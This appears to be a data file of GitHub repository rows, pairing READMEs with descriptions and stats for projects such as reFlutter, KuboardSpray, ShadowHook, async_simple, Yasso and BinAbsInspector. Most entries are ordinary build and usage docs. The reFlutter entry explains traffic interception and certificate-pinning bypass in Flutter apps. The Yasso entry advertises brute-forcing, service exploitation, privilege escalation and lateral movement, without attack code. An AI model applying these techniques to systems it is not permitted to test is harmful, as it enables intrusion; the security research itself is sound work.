from bilix.sites.bilibili import DownloaderBilibili
import asyncio


async def main():
    async with DownloaderBilibili() as d:
        await d.get_video('url')


asyncio.run(main())
```
## Community
If you find any bugs or other issues, feel free to raise an [Issue](https://github.com/HFrost0/bilix/issues).
If you have new ideas or feature requests 👍, you are welcome to join the
[Discussion](https://github.com/HFrost0/bilix/discussions)
If you find this project helpful, you can support the author with a [Star](https://github.com/HFrost0/bilix/stargazers)🌟
## Contribute
❤️ Welcome! Details can be found in [Contributing](https://github.com/HFrost0/bilix/blob/master/CONTRIBUTING_EN.md)
| ⚡️Lightning-fast async download tool for bilibili and more | async,cli,download,python,asyncio,m3u8 | 72 | 12 | 36 | 434 | 12 | 2 | 3 |
Impact-I/reFlutter | [![stars](https://img.shields.io/github/stars/Impact-I/reFlutter)](https://github.com/Impact-I/reFlutter/stargazers)
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135659542-22bb8496-bf26-4e25-b7c1-ffd8fc0cea10.png" width="75%"/></p>
**Read more on the blog:** https://swarm.ptsecurity.com/fork-bomb-for-flutter/
This framework helps with reverse engineering of Flutter apps, using a patched version of the Flutter library that is already compiled and ready for app repacking. The library's snapshot deserialization process is modified so that you can perform dynamic analysis in a convenient way.
Key features:
- `socket.cc` is patched for traffic monitoring and interception;
- `dart.cc` is modified to print classes, functions and some fields;
- displays absolute code offsets for functions;
- contains minor changes for successful compilation;
- if you would like to implement your own patches, manual Flutter code changes are supported using a specially crafted `Dockerfile`.
### Supported engines
- Android: arm64, arm32;
- iOS: arm64;
- Release: Stable, Beta
### Install
```
# Linux, Windows, MacOS
pip3 install reflutter==0.7.8
```
### Usage
```console
impact@f:~$ reflutter main.apk
Please enter your Burp Suite IP: <input_ip>
SnapshotHash: 8ee4ef7a67df9845fba331734198a953
The resulting apk file: ./release.RE.apk
Please sign the apk file
Configure Burp Suite proxy server to listen on *:8083
Proxy Tab -> Options -> Proxy Listeners -> Edit -> Binding Tab
Then enable invisible proxying in Request Handling Tab
Support Invisible Proxying -> true
impact@f:~$ reflutter main.ipa
```
### Traffic interception
You need to specify the IP of your Burp Suite proxy server, located on the same network as the device running the Flutter application. Next, you should configure the proxy in `BurpSuite -> Listener Proxy -> Options tab`
- Add port: `8083`
- Bind to address: `All interfaces`
- Request handling: Support invisible proxying = `True`
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135753172-20489ef9-0759-432f-b2fa-220607e896b8.png" width="84%"/></p>
You don't need to install any certificates. On an Android device, you don't need root access either. reFlutter also allows you to bypass some Flutter certificate pinning implementations.
### Usage on Android
The resulting apk must be aligned and signed. I use [uber-apk-signer](https://github.com/patrickfav/uber-apk-signer/releases/tag/v1.2.1)
`java -jar uber-apk-signer.jar --allowResign -a release.RE.apk`.
To see which code is loaded through DartVM, you need to run the application on the device. Note that you must manually find what `_kDartIsolateSnapshotInstructions` (e.g. 0xB000) equals, using a binary search. reFlutter writes the dump to the root folder of the application and sets `777` permissions on the file and folder. You can pull the file with the adb command
```console
impact@f:~$ adb -d shell "cat /data/data/<PACKAGE_NAME>/dump.dart" > dump.dart
```
<details>
<summary>file contents</summary>
```dart
Library:'package:anyapp/navigation/DeepLinkImpl.dart' Class: Navigation extends Object {
String* DeepUrl = anyapp://evil.com/ ;
Function 'Navigation.': constructor. (dynamic, dynamic, dynamic, dynamic) => NavigationInteractor {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000009270
}
Function 'initDeepLinkHandle':. (dynamic) => Future<void>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000412fe8
}
Function '_navigateDeepLink@547106886':. (dynamic, dynamic, {dynamic navigator}) => void {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000002638
}
}
Library:'package:anyapp/auth/navigation/AuthAccount.dart' Class: AuthAccount extends Account {
PlainNotificationToken* _instance = sentinel;
Function 'getAuthToken':. (dynamic, dynamic, dynamic, dynamic) => Future<AccessToken*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x00000000003ee548
}
Function 'checkEmail':. (dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000448a08
}
Function 'validateRestoreCode':. (dynamic, dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000412c34
}
Function 'sendSmsRestorePassword':. (dynamic, dynamic) => Future<bool*>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x00000000003efb88
}
}
```
</details>
### Usage on iOS
Use the IPA file created after executing the `reflutter main.ipa` command. To see which code is loaded through DartVM, you need to run the application on the device. reFlutter will print the dump file path to the Xcode console logs with the reFlutter tag
`Current working dir: /private/var/mobile/Containers/Data/Application/<UUID>/dump.dart`
Next, you will need to pull the file from the device
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135860648-a13ba3fd-93d2-4eab-bd38-9aa775c3178f.png" width="100%"/></p>
### Frida
The resulting offset from the dump can be used in the frida [script](https://github.com/Impact-I/reFlutter/blob/main/frida.js)
```
frida -U -f <package> -l frida.js --no-pause
```
To get the value of `_kDartIsolateSnapshotInstructions`, you can use `readelf -Ws libapp.so`; the value you need is in the `Value` field.
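For example (assuming `libapp.so` has already been pulled from the patched app into the current directory):

```bash
# Print the symbol table and filter for the snapshot instructions symbol;
# the number in the Value column is the offset you need
readelf -Ws libapp.so | grep _kDartIsolateSnapshotInstructions
```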
### To Do
- [x] Display absolute code offset for functions;
- [ ] Extract more strings and fields;
- [x] Add socket patch;
- [ ] Extend engine support to Debug using Fork and Github Actions;
- [ ] Improve detection of `App.framework` and `libapp.so` inside zip archive
### Build Engine
The engines are built using [reFlutter](https://github.com/Impact-I/reFlutter/blob/main/.github/workflows/main.yml) in [Github Actions](https://github.com/Impact-I/reFlutter/actions). To build the desired version, commits and snapshot hashes are taken from this [table](https://github.com/Impact-I/reFlutter/blob/main/enginehash.csv).
The hash of the snapshot is extracted from `storage.googleapis.com/flutter_infra_release/flutter/<hash>/android-arm64-release/linux-x64.zip`
<details>
<summary>release</summary>
[![gif](https://user-images.githubusercontent.com/87244850/135758767-47b7d51f-8b6c-40b5-85aa-a13c5a94423a.gif)](https://github.com/Impact-I/reFlutter/actions)
</details>
### Custom Build
If you would like to implement your own patches, manual Flutter code changes are supported using a specially crafted [Docker image](https://hub.docker.com/r/ptswarm/reflutter)
```bash
git clone https://github.com/Impact-I/reFlutter && cd reFlutter
docker build -t reflutter -f Dockerfile .
```
Build command:
```bash
docker run -it -v "$(pwd):/t" -e HASH_PATCH=<Snapshot_Hash> -e COMMIT=<Engine_commit> reflutter
```
Example:
```bash
docker run -it -v "$(pwd):/t" -e HASH_PATCH=aa64af18e7d086041ac127cc4bc50c5e -e COMMIT=d44b5a94c976fbb65815374f61ab5392a220b084 reflutter
```
```
# Linux, Windows
EXAMPLE BUILD ANDROID ARM64:
docker run -e WAIT=300 -e x64=0 -e arm=0 -e HASH_PATCH=<Snapshot_Hash> -e COMMIT=<Engine_commit> --rm -iv${PWD}:/t reflutter
FLAGS:
-e x64=0 <disables building for x64 architecture, use to reduce building time>
-e arm64=0 <disables building for arm64 architecture, use to reduce building time>
-e arm=0 <disables building for arm32 architecture, use to reduce building time>
-e WAIT=300 <the amount of time in seconds you need to edit source code>
-e HASH_PATCH=[Snapshot_Hash] <here you need to specify snapshot hash which matches the engine_commit line of enginehash.csv table best. It is used for proper patch search in reFlutter and for successful compilation>
-e COMMIT=[Engine_commit] <here you specify commit for your engine version, take it from enginehash.csv table or from flutter/engine repo>
```
| Flutter Reverse Engineering Framework | bugbounty,mobile-security,reverse-engineering,ssl-pinning | 178 | 3 | 199 | 230 | 35 | 181 | 1 |
eip-work/kuboard-spray |
# KuboardSpray
A graphical tool for offline installation and maintenance of K8S clusters, based on [kubespray](https://github.com/kubernetes-sigs/kubespray).
The online documentation of KuboardSpray is available at [https://kuboard-spray.cn](https://kuboard-spray.cn)
## Quick installation
On a server with at least 1 CPU core and 2 GB of RAM, no less than 10 GB of free disk space, and Docker already installed, run the following command to install KuboardSpray:
``` sh
docker run -d \
--restart=unless-stopped \
--name=kuboard-spray \
-p 80:80/tcp \
-e TZ=Asia/Shanghai \
-v /var/run/docker.sock:/var/run/docker.sock \
-v ~/kuboard-spray-data:/data \
eipwork/kuboard-spray:latest-amd64
# If you cannot pull this image, try this alternative address instead:
# swr.cn-east-2.myhuaweicloud.com/kuboard/kuboard-spray:latest-amd64
```
Enter `http://<IP address of this machine>` in your browser address bar, log in with the username `admin` and the default password `Kuboard123`, and you will reach the kuboard-spray interface; the rest can be done from the UI. If you run into trouble, try this document: <a href="https://kuboard-spray.cn/guide/install-k8s.html" target="_blank">Install a Kubernetes cluster with KuboardSpray</a>
**FAQ**
* When importing a resource package you may see errors such as `no such file or directory` or `permission denied`. This is usually because SELinux is enabled, which prevents kuboard-spray from reading the path mapped to `/data` in the container.
* The machine running kuboard-spray cannot be used as a node of the K8S cluster, because the installation restarts the container engine on the cluster nodes, which would restart kuboard-spray itself.
## Setting up a development/test environment
[Setting up a development/test environment](./docs/setup-dev/dev.md)
## Building your own resource packages
Kuboard-Spray regularly provides resource packages for the latest versions, which can be found in the kuboard-spray resource-package management UI. If you are in an offline environment, you can also find the latest resource packages at [https://kuboard.cn/support/kuboard-spray/](https://kuboard-spray.cn/support/). You can also build your own resource packages; the project is at [kuboard-spray-resource](https://github.com/eip-work/kuboard-spray-resource), and documentation on how to build resource packages was planned for February 2022.
## Community
If you are interested in this project, please star it and scan the QR code to join the chat group; the QR code is in the footer of the website.
[kuboard-spray.cn](https://kuboard-spray.cn) | 使用图形化的界面离线安装、维护、升级高可用的 K8S 集群 | kubernetes,kubespray | 14 | 1 | 2 | 552 | 75 | 1 | 0 |
bytedance/android-inline-hook | # ShadowHook
![](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat)
![](https://img.shields.io/badge/release-1.0.9-red.svg?style=flat)
![](https://img.shields.io/badge/Android-4.1%20--%2014-blue.svg?style=flat)
![](https://img.shields.io/badge/arch-armeabi--v7a%20%7C%20arm64--v8a-blue.svg?style=flat)
[**简体中文**](README.zh-CN.md)
**ShadowHook** is an Android inline hook library which supports thumb, arm32 and arm64.
ShadowHook is now used in TikTok, Douyin, Toutiao, Xigua Video, Lark.
If you need an Android PLT hook library, please move to [ByteHook](https://github.com/bytedance/bhook).
## Features
* Support Android 4.1 - 14 (API level 16 - 34).
* Support armeabi-v7a and arm64-v8a.
* Support hooking a whole function, but not hooking at a position in the middle of a function.
* Support specifying the hook location by "function address" or "library name + function name".
* Automatically complete the hook for newly loaded dynamic libraries (only "library name + function name"), and call the optional callback function after the hook is completed.
* Multiple hooks and unhooks can be executed concurrently on the same hook point without interfering with each other (only in shared mode).
* Automatically avoid possible recursive calls and circular calls between proxy functions (only in shared mode).
* The proxy function supports unwinding backtrace in a normal way (CFI, EH, FP).
* Integrated symbol address search function.
* MIT licensed.
## Documentation
[ShadowHook Manual](doc/manual.md)
## Quick Start
You can refer to the sample app in [app module](app), or refer to the hook/unhook examples of commonly used system functions in [systest module](systest).
### 1. Add dependency in build.gradle
ShadowHook is published on [Maven Central](https://search.maven.org/), and uses [Prefab](https://google.github.io/prefab/) package format for [native dependencies](https://developer.android.com/studio/build/native-dependencies), which is supported by [Android Gradle Plugin 4.0+](https://developer.android.com/studio/releases/gradle-plugin?buildsystem=cmake#native-dependencies).
```Gradle
android {
buildFeatures {
prefab true
}
}
dependencies {
implementation 'com.bytedance.android:shadowhook:1.0.9'
}
```
**Note**: ShadowHook uses the [prefab package schema v2](https://github.com/google/prefab/releases/tag/v2.0.0), which is configured by default since [Android Gradle Plugin 7.1.0](https://developer.android.com/studio/releases/gradle-plugin?buildsystem=cmake#7-1-0). If you are using Android Gradle Plugin earlier than 7.1.0, please add the following configuration to `gradle.properties`:
```
android.prefabVersion=2.0.0
```
### 2. Add dependency in CMakeLists.txt or Android.mk
> CMakeLists.txt
```CMake
find_package(shadowhook REQUIRED CONFIG)
add_library(mylib SHARED mylib.c)
target_link_libraries(mylib shadowhook::shadowhook)
```
> Android.mk
```
include $(CLEAR_VARS)
LOCAL_MODULE := mylib
LOCAL_SRC_FILES := mylib.c
LOCAL_SHARED_LIBRARIES += shadowhook
include $(BUILD_SHARED_LIBRARY)
$(call import-module,prefab/shadowhook)
```
### 3. Specify one or more ABI(s) you need
```Gradle
android {
defaultConfig {
ndk {
abiFilters 'armeabi-v7a', 'arm64-v8a'
}
}
}
```
### 4. Add packaging options
If you are using ShadowHook in an SDK project, you may need to avoid packaging libshadowhook.so into your AAR, so as not to encounter duplicate libshadowhook.so files when packaging the app project.
```Gradle
android {
packagingOptions {
exclude '**/libshadowhook.so'
}
}
```
On the other hand, if you are using ShadowHook in an APP project, you may need to add some options to deal with conflicts caused by duplicate libshadowhook.so files.
```Gradle
android {
packagingOptions {
pickFirst '**/libshadowhook.so'
}
}
```
### 5. Initialize
ShadowHook supports two modes (shared mode and unique mode). The proxy function in the two modes is written slightly differently. You can try the unique mode first.
```Java
import com.bytedance.shadowhook.ShadowHook;
public class MySdk {
public static void init() {
ShadowHook.init(new ShadowHook.ConfigBuilder()
.setMode(ShadowHook.Mode.UNIQUE)
.build());
}
}
```
### 6. Hook and Unhook
```C
#include "shadowhook.h"
void *shadowhook_hook_func_addr(
void *func_addr,
void *new_addr,
void **orig_addr);
void *shadowhook_hook_sym_addr(
void *sym_addr,
void *new_addr,
void **orig_addr);
void *shadowhook_hook_sym_name(
const char *lib_name,
const char *sym_name,
void *new_addr,
void **orig_addr);
typedef void (*shadowhook_hooked_t)(
int error_number,
const char *lib_name,
const char *sym_name,
void *sym_addr,
void *new_addr,
void *orig_addr,
void *arg);
void *shadowhook_hook_sym_name_callback(
const char *lib_name,
const char *sym_name,
void *new_addr,
void **orig_addr,
shadowhook_hooked_t hooked,
void *hooked_arg);
int shadowhook_unhook(void *stub);
```
* `shadowhook_hook_func_addr`: hook a function (which has no symbol info in ELF) by absolute address.
* `shadowhook_hook_sym_addr`: hook a function (which has symbol info in ELF) by absolute address.
* `shadowhook_hook_sym_name`: hook a function by symbol name and ELF file name or path name.
* `shadowhook_hook_sym_name_callback`: Similar to `shadowhook_hook_sym_name`, but the specified callback function will be called after the hook is completed.
* `shadowhook_unhook`: unhook.
For example, let's try to hook `art::ArtMethod::Invoke`:
```C
void *orig = NULL;
void *stub = NULL;
typedef void (*type_t)(void *, void *, uint32_t *, uint32_t, void *, const char *);
void proxy(void *thiz, void *thread, uint32_t *args, uint32_t args_size, void *result, const char *shorty)
{
// do something
((type_t)orig)(thiz, thread, args, args_size, result, shorty);
// do something
}
void do_hook()
{
stub = shadowhook_hook_sym_name(
"libart.so",
"_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc",
(void *)proxy,
(void **)&orig);
if(stub == NULL)
{
int err_num = shadowhook_get_errno();
const char *err_msg = shadowhook_to_errmsg(err_num);
LOG("hook error %d - %s", err_num, err_msg);
}
}
void do_unhook()
{
shadowhook_unhook(stub);
stub = NULL;
}
```
* `_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc` is the symbol name of `art::ArtMethod::Invoke` in libart.so after C++ name mangling. You can use readelf to view it (see the sketch after this list). C functions do not have name mangling.
* The symbol name of `art::ArtMethod::Invoke` is different in versions prior to Android M. This example only applies to Android M and later versions. If you want better compatibility across Android versions, you need to handle the differences in function symbol names yourself.
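For example, a quick way to look up the mangled symbol (a sketch; it assumes you have pulled libart.so from the device into the current directory):

```bash
# List the symbols of libart.so and filter for ArtMethod::Invoke
readelf -sW libart.so | grep ArtMethod6Invoke
```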
## Contributing
* [Code of Conduct](CODE_OF_CONDUCT.md)
* [Contributing Guide](CONTRIBUTING.md)
* [Reporting Security vulnerabilities](SECURITY.md)
## License
ShadowHook is licensed by [MIT License](LICENSE).
ShadowHook uses the following third-party source code or libraries:
* [queue.h](shadowhook/src/main/cpp/third_party/bsd/queue.h)
BSD 3-Clause License
Copyright (c) 1991, 1993 The Regents of the University of California.
* [tree.h](shadowhook/src/main/cpp/third_party/bsd/tree.h)
BSD 2-Clause License
Copyright (c) 2002 Niels Provos <provos@citi.umich.edu>
* [linux-syscall-support](https://chromium.googlesource.com/linux-syscall-support/)
BSD 3-Clause License
Copyright (c) 2005-2011 Google Inc.
* [xDL](https://github.com/hexhacking/xDL)
MIT License
Copyright (c) 2020-2023 HexHacking Team
| :fire: ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64. | android,inline,hook,inlinehook,androidinlinehook,arm,arm64,thumb,security,ndk | 8 | 10 | 0 | 72 | 5 | 2 | 0 |
YBIFoundation/Fundamental | # **Fundamental**
**[Watch Video Tutorial](https://www.youtube.com/c/YBIFoundation?sub_confirmation=1)**
**[Ask Doubt in FREE Live QnA Session](https://www.ybifoundation.org/session/live-qna-and-doubt-support)**
| Jupyter Notebook | null | 0 | 2 | 15 | 26 | 4 | 1 | 0 |
alibaba/async_simple | <p align="center">
<h1 align="center">async_simple</h1>
<h6 align="center">A Simple, Light-Weight Asynchronous C++ Framework</h6>
</p>
<p align="center">
<img alt="license" src="https://img.shields.io/github/license/alibaba/async_simple?style=flat-square">
<img alt="language" src="https://img.shields.io/github/languages/top/alibaba/async_simple?style=flat-square">
<img alt="feature" src="https://img.shields.io/badge/c++20-Coroutines-orange?style=flat-square">
<img alt="last commit" src="https://img.shields.io/github/last-commit/alibaba/async_simple?style=flat-square">
</p>
English | [中文](./README_CN.md)
async_simple is a library offering simple, light-weight and easy-to-use
components to write asynchronous code. The components offered include Lazy
(based on C++20 stackless coroutine), Uthread (based on stackful coroutine)
and the traditional Future/Promise.
# Quick Experience
We can try async_simple online in [compiler-explorer](https://compiler-explorer.com): https://compiler-explorer.com/z/Tdaesqsqj . Note that `Uthread` cannot be used in compiler-explorer since it requires installation.
# Get Started
Our documents are hosted by GitHub Pages, [go to Get Started](https://alibaba.github.io/async_simple/docs.en/GetStarted.html).
After installing and reading [Lazy](./docs/docs.en/Lazy.md) to get familiar with the API, here is a [demo](./docs/docs.en/GetStarted.md) that uses Lazy to count characters in a file.
# Install async_simple
## By Vcpkg
vcpkg is a [cross-platform package manager](https://vcpkg.io/en/getting-started).
```
./vcpkg install async-simple
```
## By Cmake
```
git clone -b main --single-branch --depth 1 https://github.com/alibaba/async_simple.git
cd async_simple
mkdir build
cd build
cmake .. -DASYNC_SIMPLE_ENABLE_TESTS=OFF -DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF -DASYNC_SIMPLE_ENABLE_ASAN=OFF
cmake --build .
cmake --install . # --prefix ./user_defined_install_path
```
# Import async_simple
After install async_simple, you can import it to your project.
## By cmake find_package
please add the following CMake code:
```cmake
find_package(async_simple REQUIRED)
target_link_libraries(<your-target-name> PRIVATE async_simple::async_simple) # dynamic_link
# async_simple::async_simple_header_only
# async_simple::async_simple_static
```
`<your-target-name>` is the name of the target that uses async_simple.
## Manually
async_simple is almost header-only, so you can just pass the include path of the installation location to your compiler.
However, the uthread part of async_simple is not header-only. If you want to use uthread, you need to link it manually; the library file is in the install path.
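A minimal sketch of manual usage, assuming the default `/usr/local` install prefix and that the installed library file is named `libasync_simple.a` (check the actual file name in your install path):

```bash
# Header-only usage: point the compiler at the installed headers
clang++ -std=c++20 -I/usr/local/include -c my_lazy_app.cpp

# Uthread usage: additionally link the installed async_simple library
clang++ -std=c++20 -I/usr/local/include my_uthread_app.cpp \
    -L/usr/local/lib -lasync_simple -lpthread
```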
# Compiler Requirement
Required Compiler: clang (>= 10.0.0) or gcc (>= 10.3) or Apple-clang (>= 14)
Note that we need to add the `-Wno-maybe-uninitialized` option when we use gcc 12, due to a false-positive diagnostic message from gcc 12.
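For example, one way to pass the option through CMake (a sketch; the `g++-12`/`gcc-12` binary names depend on your distribution):

```bash
CXX=g++-12 CC=gcc-12 cmake .. -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_CXX_FLAGS="-Wno-maybe-uninitialized"
```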
If you're using `async_simple::Generator`, there may be some compiler bugs in clang15. We suggest to use clang17 or higher for that.
If you meet any problem about MSVC Compiler Error C4737. Try to add the /EHa option to fix the problem.
# Develop async_simple
The build of async_simple requires libaio, googletest and cmake. Both libaio and googletest
are optional. (Testing before using is highly suggested.) By default, async_simple tries
to clone googletest from git to make sure the correct version is used. In case you have network
problems, you can install the gtest libraries with the following instructions and use the CMake variables (`GTEST_INCLUDE_DIR`, `GTEST_LIBRARIES`, `GMOCK_INCLUDE_DIR`, `GMOCK_LIBRARIES`) to specify their location.
## Using apt (Ubuntu and Debian)
```bash
# Install libaio
sudo apt install libaio-dev -y
# Install cmake
sudo apt install cmake -y
# Install bazel See: https://bazel.build/install/ubuntu
```
- Use `apt` to install gtest and gmock
```bash
sudo apt install -y libgtest-dev libgmock-dev
```
- [Try to build gtest and gmock from source](#Build-Dependencies-From-Source)
```bash
# Install gtest
sudo apt install libgtest-dev -y
sudo apt install cmake -y
cd /usr/src/googletest/gtest
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
cd /usr/src/googletest/gmock
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
# Install bazel See: https://bazel.build/install/ubuntu
```
## Using yum (CentOS and Fedora)
```bash
# Install libaio
sudo yum install libaio-devel -y
```
- Use `yum` to install gtest, gmock
```
sudo yum install gtest-devel gmock-devel
```
- [Try to build gtest and gmock from source](#Build-Dependencies-From-Source)
## Using Pacman (Arch)
```bash
# Optional
sudo pacman -S libaio
# Use cmake to build project
sudo pacman -S cmake gtest
# Use bazel to build project
sudo pacman -S bazel
```
## Using Homebrew (macOS)
```bash
# Use cmake to build project
brew install cmake
brew install googletest
# Use bazel to build project
brew install bazel
```
## Windows
```powershell
# Install cmake
winget install cmake
# Install google-test
# TODO
# Install bazel See: https://bazel.build/install/windows
```
## Build Dependencies From Source
```
# libaio (optional)
# you can skip this if you install libaio from packages
git clone https://pagure.io/libaio.git
cd libaio
sudo make install
# gmock and gtest
git clone git@github.com:google/googletest.git -b v1.8.x
cd googletest
mkdir build && cd build
cmake .. && sudo make install
```
## Demo example dependency
The demo example depends on standalone asio (https://github.com/chriskohlhoff/asio/tree/master/asio), commit id: f70f65ae54351c209c3a24704624144bfe8e70a3
# Build
## cmake
```bash
$ mkdir build && cd build
# Specify [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] to skip tests.
# Specify [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] to skip build demo example.
# Specify [-DASYNC_SIMPLE_DISABLE_AIO=ON] to skip the build libaio
CXX=clang++ CC=clang cmake ../ -DCMAKE_BUILD_TYPE=[Release|Debug] [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] [-DASYNC_SIMPLE_DISABLE_AIO=ON] [-DGMOCK_INCLUDE_DIR=<path-to-headers of gtest> -DGTEST_INCLUDE_DIR=<path-to-headers of mock> -DGTEST_LIBRARIES=<path-to-library-of-gtest> -DGMOCK_LIBRARIES=<path-to-library-of-gmock> ]
# for gcc, use CXX=g++ CC=gcc
make -j4
make test # optional
make install # sudo if required
```
Conan is also supported. You can install async_simple into the local Conan cache.
```
mkdir build && cd build
conan create ..
```
## bazel
```bash
# Specify [--define=ASYNC_SIMPLE_DISABLE_AIO=true] to skip the build libaio
# Example bazel build --define=ASYNC_SIMPLE_DISABLE_AIO=true ...
bazel build ... # compile all target
bazel build ...:all # compile all target
bazel build ...:* # compile all target
bazel build -- ... -benchmarks/... # compile all target except those beneath `benchmarks`
bazel test ... # compile and execute tests
# Specify compile a target
# Format: bazel [build|test|run] [directory name]:[binary name]
# Example
bazel build :async_simple # only compile libasync_simple
bazel run benchmarks:benchmarking # compile and run benchmark
bazel test async_simple/coro/test:async_simple_coro_test
# Use clang toolchain
bazel build --action_env=CXX=clang++ --action_env=CC=clang ...
# Add compile option
bazel build --copt='-O0' --copt='-ggdb' ...
```
- See [this](https://bazel.build/run/build) to get more information
- `...` means recursively scanning all targets. It is interpreted as `../..` in `oh-my-zsh`, so run it from another shell or via `bash -c '<command>'`, such as `bash -c 'bazel build ...'`, or use `bazel build ...:all`
- Use `async_simple` as a dependency, see also [bazel support](bazel/support/README.md)
# Docker Compile Environment
```
git clone https://github.com/alibaba/async_simple.git
cd async_simple/docker/(ubuntu|centos7|rockylinux)
docker build . --no-cache -t async_simple:1.0
docker run -it --name async_simple async_simple:1.0 /bin/bash
```
# Performance
We also give a [Quantitative Analysis Report](docs/docs.en/QuantitativeAnalysisReportOfCoroutinePerformance.md) of
Lazy (based on C++20 stackless coroutine) and Uthread (based on stackful coroutine).
# C++20 Modules Support
We have **experimental** support for C++20 Modules in `modules/async_simple.cppm`.
We can build the `async_simple` module by `xmake` and `cmake`.
We can find the related usage in `CountChar`, `ReadFiles`, `LazyTest.cpp` and `FutureTest.cpp`.
We need clang (>= d18806e6733 or simply clang 16) to build the `async_simple` module.
It is only tested for libstdc++10.3. Due to the current support status for C++20, it won't be a surprise if the compilation fails in higher versions of STL.
We can build the `async_simple` module with xmake (>= 0eccc6e) using the commands:
```
xmake
```
We can build the `async_simple` module with cmake (3.26 and up) and clang (>= d18806e673) using the following commands:
```
mkdir build_modules && cd build_modules
CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DASYNC_SIMPLE_BUILD_MODULES=ON -GNinja
ninja
```
**Note** that the `async_simple` module in the main branch is actually a named-module wrapper around the headers, for compatibility. We can find a practical usage of C++20 Modules in https://github.com/alibaba/async_simple/tree/CXX20Modules, which contains the support for xmake and cmake as well.
# Questions
For questions, we suggest to read [docs](./docs/docs.en), [issues](https://github.com/alibaba/async_simple/issues)
and [discussions](https://github.com/alibaba/async_simple/discussions) first.
If there is no satisfying answer, you could file an [issues](https://github.com/alibaba/async_simple/issues)
or start a thread in [discussions](https://github.com/alibaba/async_simple/discussions).
Specifically, for defect report or feature enhancement, it'd be better to file an [issues](https://github.com/alibaba/async_simple/issues). And for how-to-use questions, it'd be better to start a thread in [discussions](https://github.com/alibaba/async_simple/discussions).
# How to Contribute
1. Read the [How to fix issue](./docs/docs.en/HowToFixIssue.md) document firstly.
2. Run tests and `git-clang-format HEAD^` locally for the change. Note that the version of clang-format in CI is clang-format 14, so your local
format result may be inconsistent with the CI's. In that case, you need to install the newer clang-format or adopt the suggested change by hand. If the format result is still not good, it is OK to accept the PR temporarily and file an issue for clang-format.
3. Create a PR, fill in the PR template.
4. Choose one or more reviewers from contributors: (e.g., ChuanqiXu9, RainMark, foreverhy, qicosmos).
5. Get approved and merged.
# License
async_simple is distributed under the Apache License (Version 2.0)
This product contains various third-party components under other open source licenses.
See the NOTICE file for more information.
| Simple, light-weight and easy-to-use asynchronous components | asynchronous,coroutines,cpp20,modules,cpp20-modules | 4 | 26 | 248 | 281 | 18 | 3 | 8 |
sairson/Yasso | # Yasso
A powerful toolkit for assisting internal network penetration testing — let Yasso move like the wind. Supports brute-forcing services such as rdp, ssh, redis, postgres, mongodb, mssql, mysql and winrm, fast port scanning, powerful web fingerprinting, and one-click exploitation of built-in services (including fully interactive ssh login, mssql privilege escalation, one-click redis exploitation, mysql database queries, winrm lateral movement; many of the service modules support execution through a socks5 proxy)
# What's new in this version
Scanning and brute-forcing have been reworked on top of the original code, unnecessary features have been removed, and the code is cleaner and more complete<br>
Added protocol identification and port identification
* The new version has not been published as a release; please clone and compile it yourself
# Features
```
Usage:
Yasso [command]
Available Commands:
all Use all scanner module (.attention) Traffic is very big
completion Generate the autocompletion script for the specified shell
exploit Exploits to attack the service
help Help about any command
service Detection or blasting services by module
Flags:
-h, --help help for Yasso
--output string set logger file (default "result.txt")
```
- all: one-click scan
- exploit: exploitation of common services (sqlserver, redis, ssh, Sunlogin, etc.)
- service: service brute-forcing and sub-scan modules
See `-h` of each command for details.
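For example (a sketch; it simply queries the built-in help of each module):

```bash
# List sub-commands and flags of the service module
Yasso service -h

# List flags of the exploit module
Yasso exploit -h
```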
| 强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,mssql,mysql,winrm等服务爆破,快速的端口扫描,强大的web指纹识别,各种内置服务的一键利用(包括ssh完全交互式登陆,mssql提权,redis一键利用,mysql数据库查询,winrm横向利用,多种服务利用支持socks5代理执行) | null | 7 | 2 | 1 | 55 | 5 | 1 | 0 |
KeenSecurityLab/BinAbsInspector | # What is BinAbsInspector?
BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at [Keenlab](https://keenlab.tencent.com/). It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.
# Installation
+ Install Ghidra according to [Ghidra's documentation](https://github.com/NationalSecurityAgency/ghidra#install)
+ Install [Z3](https://github.com/Z3Prover/z3) (tested version: 4.8.15)
+ Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
+ For Windows, download a pre-built package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and add a PATH environment variable pointing to `z3-${version}-win/bin`
+ For Linux, install with package manager is NOT recommended, there are two options:
1. You can download suitable pre-build package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and copy `z3-${version}-glibc-${version}/bin/*.so` to `/usr/local/lib/`
2. or you can build and install z3 according to [Building Z3 using make and GCC/Clang](https://github.com/Z3Prover/z3#building-z3-using-make-and-gccclang)
+ For MacOS, it is similar to Linux.
+ Download the extension zip file from [release page](https://github.com/KeenSecurityLab/BinAbsInspector/releases)
